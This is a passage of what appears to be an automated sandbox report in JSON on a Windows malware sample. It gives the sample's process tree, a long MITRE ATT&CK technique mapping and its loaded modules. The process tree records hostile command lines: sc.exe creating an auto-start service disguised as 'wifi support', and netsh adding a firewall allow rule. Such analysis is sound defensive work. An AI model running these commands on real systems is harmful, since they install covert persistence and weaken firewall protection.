\"%WINDIR%\\system32\\vrzjqkmq\\dqczsfku.exe /d\\\"C:\\89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005028", "parentuid": "00000000-00004680", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description vrzjqkmq \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005144", "parentuid": "00000000-00004680", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start vrzjqkmq", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005184", "parentuid": "00000000-00004680", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00005212", "name": "dqczsfku.exe", "normalized_path": "%WINDIR%\\system32\\vrzjqkmq\\dqczsfku.exe", "command_line": "/d\"C:\\89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\"", "sha256": "94aaefa0b6eece4a7f724a4ac9550380e964344955555bc2f7a60e72d81d91f3"}, {"uid": "00000000-00002988", "parentuid": "00000000-00005212", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 6, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 5, "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 2}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"KERNEL32.DLL\" at base 76b60000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"WS2_32.DLL\" at base 772b0000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"DBGHELP.DLL\" at base 6f830000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"USER32.DLL\" at base 76910000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"ADVAPI32.DLL\" at base 76a10000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"SHELL32.DLL\" at base 75bb0000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"OLEAUT32.DLL\" at base 76d10000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"MSVCR100.DLL\" at base 69c40000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"NTDLL.DLL\" at base 770f0000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"OLE32.DLL\" at base 75900000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"CRYPTBASE.DLL\" at base 74ef0000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e50000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"PROPSYS.DLL\" at base 73c70000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"COMCTL32.DLL\" at base 73ec0000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"APPHELP.DLL\" at base 74ea0000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"CLBCATQ.DLL\" at base 76db0000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a080000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b60000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"SETUPAPI.DLL\" at base 75440000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"RPCRT4.DLL\" at base 76800000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73c70000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"NTMARTA.DLL\" at base 74460000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77240000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"PROFAPI.DLL\" at base 75010000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75030000\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75a60000\n 